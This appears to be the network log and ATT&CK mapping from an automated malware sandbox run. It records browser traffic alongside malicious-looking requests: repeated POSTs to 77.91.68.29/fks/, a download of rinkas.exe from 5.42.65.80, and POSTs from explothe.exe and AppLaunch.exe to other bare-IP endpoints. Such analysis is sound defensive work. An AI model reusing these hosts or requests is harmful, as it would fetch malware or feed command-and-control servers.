GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVheNjRAygS-m1hLkQGhWLI-_B9gWyk542KxR1CSY4sSKMl-9PnOfB_LRCNOR0C7DTsSR5VGjkQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1460296733%3A1697016307851706&theme=glif

HTTP Request

GET https://accounts.google.com/

HTTP Request

POST https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=8592231658167204169&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=33944&rt=c

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Request

GET https://accounts.google.com/_/bscframe

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhdnn69lGdvTg3STPGL8dzCvaw_K7colJE-BRPdkb9PgdZ1PVjMfxR1NeafUtp2j1JUF8l0B4A

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhdVmI8yzHXTlbFjMZ-K4RAcCKVWlLFMN5vVZjo1TnAbR6MMjt4vwW4KKEmB6r4PHPIrIE-38Q&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1626813541%3A1697016346600453&theme=glif
157.240.201.35:443

www.facebook.com

tls

msedge.exe

19.1kB
353.9kB
166
277
77.91.68.29:80

http://77.91.68.29/fks/

http

115.6kB
2.6MB
1825
1886

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

19.8kB
504.5kB
318
434
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

839 B
2.7kB
7
6
157.240.231.35:443

facebook.com

tls

msedge.exe

1.8kB
4.1kB
14
16
157.240.231.35:443

fbcdn.net

tls

msedge.exe

1.8kB
5.0kB
15
14
77.91.124.55:19071

AppLaunch.exe

260 B
5
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

493.0kB
16.7MB
8337
12475

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

466 B
325 B
5
4

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.7kB
8.3kB
12
12

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

748 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

134.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

134.32.126.40.in-addr.arpa
8.8.8.8:53

126.24.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

126.24.238.8.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

54.120.234.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

54.120.234.20.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

232.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

232.135.221.88.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

126.20.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

126.20.238.8.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
142.250.179.141:443

accounts.google.com

https

msedge.exe

3.1kB
6.2kB
6
6
224.0.0.251:5353

382 B
6
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.231.1
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

1.231.240.157.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

1.231.240.157.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.231.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.231.35
8.8.8.8:53

35.231.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.231.240.157.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.231.35
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
142.251.36.14:443

play.google.com

https

msedge.exe

5.3kB
8.1kB
10
14
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

11.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery